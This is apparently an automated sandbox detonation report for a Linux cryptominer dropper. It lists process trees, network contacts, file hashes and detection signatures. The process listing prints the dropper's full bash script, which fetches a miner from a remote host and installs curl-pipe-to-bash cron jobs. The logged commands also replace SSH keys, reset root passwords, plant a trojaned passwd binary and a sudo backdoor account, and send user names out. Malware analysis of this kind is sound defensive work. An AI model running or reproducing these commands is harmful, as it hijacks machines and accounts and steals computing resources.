[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.yslDS5CLWR /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.yslDS5CLWR]

/usr/bin/tr

[tr \n ]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/xrx/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

/usr/bin/chmod

[chmod 4755 /bin/passwd]

/usr/bin/chmod

[chmod u+s /bin/passwd]

/usr/bin/cp

[cp /bin/passwd /usr/bin/passwd]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/pam_tms]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/pam_tms]

/usr/bin/chmod

[chmod +x /sbin/pam_tms]

/usr/bin/grep

[grep -q pam_tms /etc/pam.d/common-auth]

/usr/sbin/useradd

[useradd cheeki]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/usermod

[usermod -aG sudo cheeki]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/usermod

[usermod -aG wheel cheeki]

/usr/sbin/usermod

[usermod -p $6$vrC8Hya.mmeUeIem$Li01KI3RQUpyYepjXUhHF23fTle/wXqAoR0xUFo697faBvmsuXJBTMMK89vGf1YHzhztRGGsNbA/eTIIRXy5Y/ cheeki]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/bin/mv

[mv /var/tmp/.xrx/key /home/cheeki/.ssh/authorized_keys]

/usr/bin/mkdir

[mkdir /var/tmp/.x]

/usr/bin/mv

[mv /var/tmp/.xrx/secure /var/tmp/.x/secure]

/usr/bin/chmod

[chmod +x /var/tmp/.x/secure]

/var/tmp/.x/secure

[/var/tmp/.x/secure]

/usr/bin/base64

[base64]

/usr/bin/tr

[tr \n ]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/curl

[curl -s http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA=]

Network

Country  Destination           Domain                            Proto
N/A      224.0.0.251:5353                                        udp
US       8.8.8.8:53            _http._tcp.se.archive.ubuntu.com  udp
US       8.8.8.8:53            se.archive.ubuntu.com             udp
US       8.8.8.8:53            se.archive.ubuntu.com             udp
SE       194.71.11.163:80      se.archive.ubuntu.com             tcp
IT       185.252.178.82:6972                                     tcp
IT       185.252.178.82:6972                                     tcp
IT       185.252.178.82:6972                                     tcp
IT       185.252.178.82:6972                                     tcp
CH       179.43.154.189:1010                                     tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-4_amd64.deb

MD5 e28b5a75d1616a43c64c4c6575f66cdc
SHA1 08301116f9570ebce9a5daad04116d248b4e2fad
SHA256 09a27b6e9acaea64b039dfc20d93114c4b968baf899f7dfc764607efea863986
SHA512 655c8abcfe5c3a4e9fa6f9a35b4bfd8cfa6a3d93f1bd5e169ef3193cb5ea92467cc6e9fbc23fe0809d6223858f335ccab4f6b38ce3c4df8651bc87a62f41dd5c

/var/log/apt/eipp.log.xz

MD5 cdf7555ac28a0c36aba1e3ff1e381f94
SHA1 b60cb5aec5a93830c7336979053bd2cc7102df6d
SHA256 64335031b96a38f4154b49de259777f8226734d6f4b064b77a0551f16efce274
SHA512 bc1701bffb01a31fcbd0cce21eadf43ef80b0ee90cf8251636a04d7b6968593575c8f1132c419be818528fc2c18650990c5800308916c78ba334114df74fb7c5

/var/lib/dpkg/updates/tmp.i

MD5 cee328ac0a2780f6e18a6df6e6891cda
SHA1 aaed4f8bc2ee9d05d14ccf4882513d4c23f92ab2
SHA256 b9bf88055a0096d2acdb702317fdb417394a2b650c89a7238e03eb5d4bfd6d9f
SHA512 6c2e65eddf29a5c5aa9d860285666e5584de20d10951638ae5ac5233c5b39e659adc1db92cc081953ce64f06cfacd93ccdbd6d1531bd8da38e9549bf2ffed9e7

/var/lib/dpkg/tmp.ci/control

MD5 d55f250f60b4e9a0fbd78ff7cdbd9606
SHA1 9771d0932d4f7b3a635fb35a723d2d85b3d9eb49
SHA256 8358bb7f2da0e21a05d5cc2b1a747ba60a1296061c2bbeecd90dc9aeec9ea0f3
SHA512 670a9e38167a4529ef916b6c6827f0badb60a329dd9cdd8d2fe99e0c008e670f8f0c56b6aca34c745f67ff8b56f787064ee48fb52607244031b4b7447d9a46d7

/var/lib/dpkg/tmp.ci/md5sums

MD5 68fabacdc3155c3365664ba770fa5fae
SHA1 5c0d745040fa51759317b8557c8e1e44c39667ae
SHA256 053449dfc437b483162c304156a0dd88f42615a8e434256407d13a6b889bb1bd
SHA512 445729051dbc60678fb984f5460972c99b9eded95d1cd3ab2ff47c7002139b50b9a934fc8f69bf3cd25c6b8add25572d092fbfea481ab63c33f822e24d73f52c

/var/lib/dpkg/updates/tmp.i

MD5 9eff99bb465f3c182968d25837b1db26
SHA1 db104c7098d6404ea0423fe6c2ee719e8909dbb2
SHA256 8fb9ce68dafc5a31c4ad13db7080a180fe7f0ae8df163bc725514a11dac576a6
SHA512 7faedca2dccce1f30e39b7301a255064f610496138f234e70d086bdc6ce981ce4617c3371c7395b091d71ad82bdc754d65c623f85dd8b0f94f779b92d79b28c0

/var/lib/dpkg/updates/tmp.i

MD5 1a4d72a8c987b513ede27054dc3989d4
SHA1 ce402e89a6529560cf1eeb9b1ed4b9245a025eec
SHA256 e5443963228a4557e08c23540ebc73ae13d1fda07bc9971984b9267622c4ff97
SHA512 386dd121aa694ddd3e423f75169e97f7ae2faffa00375af09c1040f36a62bb7cc416627176b0779fd279e47764d8c1b7fd150505758131df0b3dc3d7a01d0be4

/var/lib/dpkg/updates/tmp.i

MD5 05e8860042eda59949e08127ae1d85a9
SHA1 b51abc2a1f3a4d30cb610b39979bdf8186924d89
SHA256 949563c9c05ecb391ccf31618ceb5e2583be297c1e7ac6c77245a84c56b38462
SHA512 0f4f26a3ecc82d9d05a275957178672ae3d156de984ed8ac5412fcd7903912e5c45a08c6eca65a22ce8996091ac9ba1a47677e4fb3718672e4c5c94b297c965f

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 50273ba4ce0efd68b1d4b84be31f24fe
SHA1 3b2d7e1e8834c84d99e1907d6d5efae3e4c7fefc
SHA256 c65f46b29af2cd4a849a4e968d7c38102c7a117e5bf563cc90c4a4fb6033a5b8
SHA512 5c00f87fba0639414ea933d0650c2e95e6d06b464a5f7ac20395e8d92b92fdf88460a33876526447e8d224eb2ee4d13999799002db508e54a4ded67086ea6337

/var/cache/man/1608

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 ba297b58af776ade0e8f90130f83a404
SHA1 36a5a92456bcadd6151e462eef6ffa482bbb3c47
SHA256 f805e030a5e25ea381317c43e6d4d975cb026c62fed061c1528296b88dac24a3
SHA512 ef44f476c7a317619e1cafc2cfa0ab3b7dff6fe99a32297c4331b18ec06a25168db1687218c2a48ba75f0d1f79cb58ca1f11f5db2a5573bc71d02d6c391bb21e

/var/lib/update-notifier/tmp.yslDS5CLWR

MD5 e8800b26db4f6d77b97d8e69814b1448
SHA1 ed2ea2110cc9bd19772a4e83f2d65a9d2bb2d01a
SHA256 4e63f9b0dbaef1130599ff9e04d44bf9fe1a3c858dcdd20e5581467d93dad1d7
SHA512 103718e67e0287f6582bbf2375e5c8c35da8be67b00634e305a796d0ddde6f012ecaf12eed7192739d821000ddc101bcaf341c223620e9dbc8c0dc8b3be6dcdd

/root/.ssh/authorized_keys

MD5 ccd9cd77d2eb605e072a608b23bed991
SHA1 95a5b3a753122370cb429c8c1ad346a5dac04560
SHA256 7030c0f2c017d2e433965bf1112ea402ff36d852af1c2969261fc2b66d94183d
SHA512 9676f9b7bec2f916921f99e46885f326a1374fb20715582dbdd87942ab5b9dfde5e78a96c62b14108c9229717e40a7dce880c787f9ff79ab42a4e9fd209cea62

/etc/passwd+

MD5 a457803380f9fc302a9a520f258ebf19
SHA1 264a387ce526d9ba3d0a98a4beb91d12a9618979
SHA256 eab5884c5bda06a680f52dc9f6f89d55e34288ad16e7eea3450b4a761e45e200
SHA512 8a715be71963b84fac3099a751462b7850896368250fd318fe6112d2fc0816ba356f03e2de47860a1013bffa1b784b116718985a8e4fc173a795b57ea0cb037f

/etc/shadow+

MD5 efc001e6b612f04cd054e03ed0c13c56
SHA1 7fc7deba0b8f0f7cd8e7ec448be75df29a4370b6
SHA256 65a1829fe3e3e87eb9bf478bf3bbfb2935a3400f80eebf7f20ace7d5a714c67c
SHA512 679f4c0e86053a0e4572cd4efa5fbfb6257b7e16c74b7944f3eba96de0cf858bb1c96ae40ecfe780749e9648c4fbdd66ad46ac4ef94d31f917c7df8877383f87

/etc/shadow+

MD5 3fc6946a23dbf6e9f9139b6753f49675
SHA1 8c18fd8e6373a8608e11ff344bddc4d4a08d57e6
SHA256 15535d59908877400f28351138502236cd69bdc549f3bfaa571b8466f5a0f09e
SHA512 a5a5b647a9ab1d2de51e2615d8ef8f45ac26466e0821b83ebf778843fbe82bde008b3495e55a5f29a519cf29d39299d582c1b17ac4748300f43ea3eb425a0c8a

/etc/passwd+

MD5 2f945a2cdd2ca12f3f4609bed6d9a485
SHA1 a481542d3274ef8294970c30c3a87b1fc0133693
SHA256 c9fbf28326e7a932a4ca48b88d0ffe34988a24538ada078644ae5d507517cf74
SHA512 38c5ee6c12bc2ea92055193b1195ed7e8d596c42aa8d24e1f09882bb17c461de2bb90b91e41e4d68a9d783cd121522a1c193249f7f773f00cfb41ccfc6615166

/etc/shadow+

MD5 78f716b93f86d3667a8eb71ff28d7b5f
SHA1 ee9ab2f0158c925ffdc03f902e01cee771af45a3
SHA256 1d0bfe94f705cb94fb5c85f29ead19d5e43bf50f48ab6ad98eaf90caf9f3ad47
SHA512 c72f8bbb12987caf02a3b83f9cdac8cbe754945abbfea8015da726ffecc19643feebd61aed02d60471001b64c9e7632789a28ff91c4104456c597048c342e939

/etc/group+

/etc/gshadow+

/etc/subuid+

/etc/group+

/etc/gshadow+

/etc/shadow+


Analysis: behavioral25

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2004-amd64-20240508-en

Max time kernel

19s

Max time network

134s

Command Line

[/tmp/xrx/secure]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/bash N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/641/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/17/status /usr/bin/pgrep N/A
File opened for reading /proc/1003/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1348/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/74/status /usr/bin/pgrep N/A
File opened for reading /proc/1095/status /usr/bin/pgrep N/A
File opened for reading /proc/1149/status /usr/bin/pgrep N/A
File opened for reading /proc/1083/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/457/status /usr/bin/pgrep N/A
File opened for reading /proc/491/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1038/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1405/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/670/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pgrep N/A
File opened for reading /proc/166/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/170/status /usr/bin/pgrep N/A
File opened for reading /proc/986/status /usr/bin/pgrep N/A
File opened for reading /proc/1102/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1028/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1080/status /usr/bin/pgrep N/A
File opened for reading /proc/3/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/174/status /usr/bin/pgrep N/A
File opened for reading /proc/1130/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/19/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/458/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1130/status /usr/bin/pgrep N/A
File opened for reading /proc/7/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/74/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/954/status /usr/bin/pgrep N/A
File opened for reading /proc/1033/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/803/status /usr/bin/pgrep N/A
File opened for reading /proc/2/status /usr/bin/pgrep N/A
File opened for reading /proc/986/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1094/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/118/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/806/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1091/status /usr/bin/pgrep N/A
File opened for reading /proc/1/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/140/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/84/status /usr/bin/pgrep N/A
File opened for reading /proc/443/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/696/status /usr/bin/pgrep N/A
File opened for reading /proc/764/status /usr/bin/pgrep N/A
File opened for reading /proc/676/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1083/status /usr/bin/pgrep N/A
File opened for reading /proc/996/status /usr/bin/pgrep N/A
File opened for reading /proc/23/status /usr/bin/pgrep N/A
File opened for reading /proc/996/status /usr/bin/pgrep N/A
File opened for reading /proc/1078/status /usr/bin/pgrep N/A
File opened for reading /proc/91/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/443/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/173/status /usr/bin/pgrep N/A
File opened for reading /proc/271/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/803/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/617/status /usr/bin/pgrep N/A
File opened for reading /proc/140/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1050/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/17/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/486/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/491/status /usr/bin/pgrep N/A
File opened for reading /proc/1033/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1091/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/90/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1095/cmdline /usr/bin/pgrep N/A

Processes

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c exec '/tmp/xrx/secure' "$@" /tmp/xrx/secure]

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." 
downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/xrx/secure]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/grep

[grep -q secure]

/usr/bin/cat

[cat /etc/crontab]

/usr/bin/sleep

[sleep 1]

/var/tmp/.xrx/xrx

[/var/tmp/.xrx/xrx]

/usr/bin/pgrep

[pgrep xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/49/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1803/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1952/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2129/stat /usr/bin/pidof N/A
File opened for reading /proc/2476/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2326/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2473/stat /usr/bin/pidof N/A
File opened for reading /proc/3/stat /usr/bin/pidof N/A
File opened for reading /proc/38/cmdline /usr/bin/pidof N/A
File opened for reading /proc/43/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1911/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2191/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2/stat /usr/bin/pidof N/A
File opened for reading /proc/194/stat /usr/bin/pidof N/A
File opened for reading /proc/1116/stat /usr/bin/pidof N/A
File opened for reading /proc/15/cmdline /usr/bin/pidof N/A
File opened for reading /proc/191/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1044/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1957/cmdline /usr/bin/pidof N/A
File opened for reading /proc/21/cmdline /usr/bin/pidof N/A
File opened for reading /proc/191/stat /usr/bin/pidof N/A
File opened for reading /proc/1392/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2283/stat /usr/bin/pidof N/A
File opened for reading /proc/2475/cmdline /usr/bin/pidof N/A
File opened for reading /proc/12/cmdline /usr/bin/pidof N/A
File opened for reading /proc/18/stat /usr/bin/pidof N/A
File opened for reading /proc/31/stat /usr/bin/pidof N/A
File opened for reading /proc/202/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1703/cmdline /usr/bin/pidof N/A
File opened for reading /proc/55/stat /usr/bin/pidof N/A
File opened for reading /proc/787/cmdline /usr/bin/pidof N/A
File opened for reading /proc/8/cmdline /usr/bin/pidof N/A
